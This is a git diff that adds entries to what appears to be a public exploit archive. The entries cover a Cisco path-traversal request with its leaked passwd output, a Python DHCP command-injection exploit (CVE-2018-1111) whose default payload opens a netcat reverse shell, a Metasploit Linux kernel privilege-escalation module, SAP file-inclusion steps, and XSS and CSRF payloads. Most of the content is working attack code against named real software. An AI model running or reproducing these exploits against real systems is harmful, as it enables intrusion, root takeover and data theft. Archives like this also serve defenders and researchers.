diff --git a/exploits/hardware/local/44644.txt b/exploits/hardware/local/44644.txt new file mode 100644 index 000000000..151fee093 --- /dev/null +++ b/exploits/hardware/local/44644.txt @@ -0,0 +1,20 @@ +For Xbox-SystemOS version: 10.0.14393.2152 (rs1_xbox_rel_1610 161208-1218) fre, 12/14/2016 + +Other versions will most likely need modifications to the script. + +**Credits**: +- https://github.com/theori-io/chakra-2016-11 +- https://bugs.chromium.org/p/project-zero/issues/detail?id=952 +- https://bugs.chromium.org/p/project-zero/issues/detail?id=945 + +**Info**: +It is not sufficient to start an .exe via shellcode ;) + +Exploiters, be creative! + +It is desired to find a way to invoke edge engine when console is offline + +Greets from unknownv2 & mon0 _ + + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44644.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/44650.txt b/exploits/hardware/webapps/44650.txt new file mode 100644 index 000000000..703357f8e --- /dev/null +++ b/exploits/hardware/webapps/44650.txt @@ -0,0 +1,55 @@ +# Title: Cisco SA520W Security Appliance - Path Traversal +# Author: Nassim Asrir +# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# Vendor: https://www.cisco.com/ +# About Product: +=============== +Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees. +They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats. + +# POC +==================== + +//In our poc we will try to read /etc/passwd + +The vulnerable Parameter: thispage + +payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm + +Request Type: POST + +Request: +======= + +POST /scgi-bin/platform.cgi HTTP/1.1 +Host: host-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://70.186.255.169/scgi-bin/platform.cgi +Content-Type: application/x-www-form-urlencoded +Content-Length: 311 +Connection: close +Upgrade-Insecure-Requests: 1 + +thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 + +Response: +======== + +HTTP/1.0 200 OK +Date: Sat, 01 Jan 2000 00:00:41 GMT +Server: Embedded HTTP Server. +Connection: close +root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh +nobody:x:0:0:nobody:/nonexistent:/bin/false + +#Timeline: +========= + +18 Apr 2018 : First Contact with Cisco. +18 Apr 2018 : Cisco Ask me for more details about the vulnerability. +18 Apr 2018 : Details sent to Cisco +19 Apr 2018 : Ask for update +15 May 2018 : Cisco say "The product you reference went end of support in April 2016 No further action will be taken." +18 May 2018 : Public Disclosure \ No newline at end of file diff --git a/exploits/linux/local/44652.py b/exploits/linux/local/44652.py new file mode 100755 index 000000000..c6d50ff70 --- /dev/null +++ b/exploits/linux/local/44652.py @@ -0,0 +1,65 @@ +# Exploit Title: DynoRoot DHCP - Client Command Injection +# Date: 2018-05-18 +# Exploit Author: Kevin Kirsche +# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111 +# Exploit Discoverer: Felix Wilhelm +# Vendor Homepage: https://www.redhat.com/ +# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x +# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4 +# CVE : CVE-2018-1111 + +#!/usr/bin/env python + +from argparse import ArgumentParser +from scapy.all import BOOTP_am, DHCP +from scapy.base_classes import Net + + +class DynoRoot(BOOTP_am): + function_name = "dhcpd" + + def make_reply(self, req): + resp = BOOTP_am.make_reply(self, req) + if DHCP in req: + dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1])) + for op in req[DHCP].options + if isinstance(op, tuple) and op[0] == "message-type"] + dhcp_options += [("server_id", self.gw), + ("domain", self.domain), + ("router", self.gw), + ("name_server", self.gw), + ("broadcast_address", self.broadcast), + ("subnet_mask", self.netmask), + ("renewal_time", self.renewal_time), + ("lease_time", self.lease_time), + (252, "x'&{payload} #".format(payload=self.payload)), + "end" + ] + resp /= DHCP(options=dhcp_options) + return resp + + +if __name__ == '__main__': + parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit') + + parser.add_argument('-i', '--interface', default='eth0', type=str, + dest='interface', + help='The interface to listen for DHCP requests on (default: eth0)') + parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str, + dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)') + parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str, + dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)') + parser.add_argument('-d', '--domain', default='victim.net', type=str, + dest='domain', help='Domain to assign (default: victim.net)') + parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str, + dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)') + + args = parser.parse_args() + server = DynoRoot(iface=args.interface, domain=args.domain, + pool=Net(args.subnet), + network=args.subnet, + gw=args.gateway, + renewal_time=600, lease_time=3600) + server.payload = args.payload + + server() \ No newline at end of file diff --git a/exploits/linux/local/44654.rb b/exploits/linux/local/44654.rb new file mode 100755 index 000000000..496d4f9ff --- /dev/null +++ b/exploits/linux/local/44654.rb @@ -0,0 +1,203 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation', + 'Description' => %q{ + This module exploits a heap-out-of-bounds write in the packet_set_ring + function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel + to execute code as root (CVE-2017-7308). + + The bug was initially introduced in 2011 and patched in version 4.10.6, + potentially affecting a large number of kernels; however this exploit + targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, + including Linux distros based on Ubuntu Xenial, such as Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + This module has been tested successfully on Linux Mint 18 (x86_64) + with kernel versions: + + 4.8.0-34-generic; + 4.8.0-36-generic; + 4.8.0-39-generic; + 4.8.0-41-generic; + 4.8.0-42-generic; + 4.8.0-44-generic; + 4.8.0-45-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrey Konovalov', # Discovery and C exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Mar 29 2017', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'EDB', '41994' ], + [ 'CVE', '2017-7308' ], + [ 'BID', '97234' ], + [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ], + [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ], + [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ], + [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + write_file path, data + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + gcc_cmd = "gcc -o #{path} #{path}.c" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + + output = cmd_exec gcc_cmd + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/ + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} is vulnerable" + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + cores = get_cpu_info[:cores].to_i + min_required_cores = 2 + unless cores >= min_required_cores + vprint_error "System has less than #{min_required_cores} CPU cores" + return CheckCode::Safe + end + vprint_good "System has #{cores} CPU cores" + + unless userns_enabled? + vprint_error 'Unprivileged user namespaces are not permitted' + return CheckCode::Safe + end + vprint_good 'Unprivileged user namespaces are permitted' + + if kptr_restrict? && dmesg_restrict? + vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.' + return CheckCode::Safe + end + + CheckCode::Appears + end + + def exploit + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('poc.c') + rm_f "#{executable_path}.c" + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx executable_path, exploit_data('exploit') + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec "#{executable_path} #{payload_path}" + output.each_line { |line| vprint_status line.chomp } + print_status 'Deleting executable...' + rm_f executable_path + Rex.sleep 5 + print_status 'Deleting payload...' + rm_f payload_path + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44647.txt b/exploits/linux/webapps/44647.txt new file mode 100644 index 000000000..0e56084ef --- /dev/null +++ b/exploits/linux/webapps/44647.txt @@ -0,0 +1,47 @@ +# Application: SAP NetWeaver Web Dynpro 6.4 to 7.5 - Information disclosure +# Versions Affected: SAP NetWeaver 6.4 - 7.5 +# Vendor URL: http://SAP.com +# Bugs: Information disclosure (Enumerate users) +# Sent: 2016-12-15 +# Reported: 2016-12-15 +# Date of Public Advisory: 09.02.2016 +# Reference: SAP Security Note 2344524 +# Author: Richard Alviarez (SIA Group) +# CVE: N/A + +# 1. ADVISORY INFORMATION +# Title: SAP NetWeaver Web Dynpro – information disclosure (Enumerate users) +# Advisory ID: 2344524 +# Risk: Medium +# Date published: 20.12.2016 + +# 2. VULNERABILITY DESCRIPTION +# Anonymous attacker can use a special HTTP request to get information +# about SAP NetWeaver users. + +# 3. VULNERABLE PACKAGES +# SAP NetWeaver Web Dynpro 6.4 - 7.5 +# Other versions are probably affected too, but they were not checked. + +# 4. TECHNICAL DESCRIPTION +# A potential attacker can use the vulnerability in order to reveal +# information about user names, +# first and last names, and associated emails, this can provide an attacker +# with enough information +# to make a more accurate and effective attack + +# Steps to exploit this vulnerability + +1. Open +http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate +or +http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate + +page on SAP server + +2. Press "Change processor" button + +3. and in the "find" section, put the initial or name to be searched, +followed by a * + +You will get a list of SAP users and information. \ No newline at end of file diff --git a/exploits/linux/webapps/44655.txt b/exploits/linux/webapps/44655.txt new file mode 100644 index 000000000..d96e1d566 --- /dev/null +++ b/exploits/linux/webapps/44655.txt @@ -0,0 +1,43 @@ +# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion +# Application:SAP B2B OR B2C is CRM +# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b) +# Vendor URL: http://SAP.com +# Bugs: SAP LFI in B2B OR B2C CRM +# Sent: 2018-05-03 +# Reported: 2018-05-03 +# Date of Public Advisory: 2018-02-09 +# Reference: SAP Security Note 1870255656 +# Author: Richard Alviarez + +# 1. VULNERABLE PACKAGES +# SAP LFI in B2B OR B2C CRM v2.x to 4.x +# Other versions are probably affected too, but they were not checked. + +# 2. TECHNICAL DESCRIPTION +# A possible attacker can take advantage of this vulnerability +# to obtain confidential information of the platform, +# as well as the possibility of writing in the logs of the +# registry in order to get remote execution of commands and take control of the system. + + +# 3. Steps to exploit this vulnerability + +A. Open +https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml + +Other vulnerable parameters: + +https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml +https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml +https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml +page on SAP server + +B. Change parameter {name} for example icss_b2b or other name.... + +C. Change "/WEB-INF/web.xml" for other files or archives internal. + + +# 4. Collaborators +# - CuriositySec +# - aDoN90 +# - Vis0r \ No newline at end of file diff --git a/exploits/php/webapps/44645.txt b/exploits/php/webapps/44645.txt new file mode 100644 index 000000000..4bb88c1c6 --- /dev/null +++ b/exploits/php/webapps/44645.txt @@ -0,0 +1,70 @@ +# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery +# Date: 2018-05-17 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499 +# Version: 3.0 +# Tested on: windows + +# POC 1 : Cross site scripting : +1) Create an account and go to your profile. +2) When we want to put "" in the fields,"script" will be +replaced with null. +so we can bypass this filter by using javascript's events like +"onmouseover" or "oninput" . +Put one of these payloads into the fields : +1 - " oninput=alert('xss') " +2 - " onmouseover=alert('xss') " +3) You will get an alert box inside the page . ( after put something into +the fields or move mouse on the fields) + + +# POC 2 : Cross-Site request forgery : +# With csrf vulnerability,attacker can easily change user's authentication. +# So in this script , we have anti-CSRF token .We can't change user's +# information without token. +# but there is a vulnerable parameter which has reflected xss in another page +# of this script. +# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here] +# Now we can bypass anti-csrf by this parameter and using javascript: + + +# Exploit : + +"/>
+ + +# You can also send 2 ajax requests instead of using form . +# Encode this payload and put this into "msg" parameter +# JSON result after 3 seconds : + +status "SUCCESS" +msg "User profile updated !" \ No newline at end of file diff --git a/exploits/php/webapps/44646.txt b/exploits/php/webapps/44646.txt new file mode 100644 index 000000000..7f0ff2dd4 --- /dev/null +++ b/exploits/php/webapps/44646.txt @@ -0,0 +1,48 @@ +# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting +# Date: 2018-05-17 +# Exploit Author: Berk Dusunur +# Vendor Homepage: https://monstra.org +# Software Link: https://monstra.org +# Version: before 3.0.4 +# Tested on: Pardus / Win10 AppServer + +# Proof Of Concept +# Monstra is a modern and lightweight Content Management System. +# Prints get request between script tags on page + + +Payload ?vrk2f'-alert(1)-'ax8vv=1 + +GET Request + +GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 +Host: 192.168.1.106 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Response + + + + + ++ + +http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 \ No newline at end of file diff --git a/exploits/php/webapps/44651.txt b/exploits/php/webapps/44651.txt new file mode 100644 index 000000000..623731f33 --- /dev/null +++ b/exploits/php/webapps/44651.txt @@ -0,0 +1,31 @@ +# Exploit Title: Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery +# Date: 2018-05-18 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520 +# Version: 1.6.2 +# Tested on: Kali linux + +# Description : CSRF vulnerability allows attacker to change user's information directly . + +# POC : + + +
+
+ +
+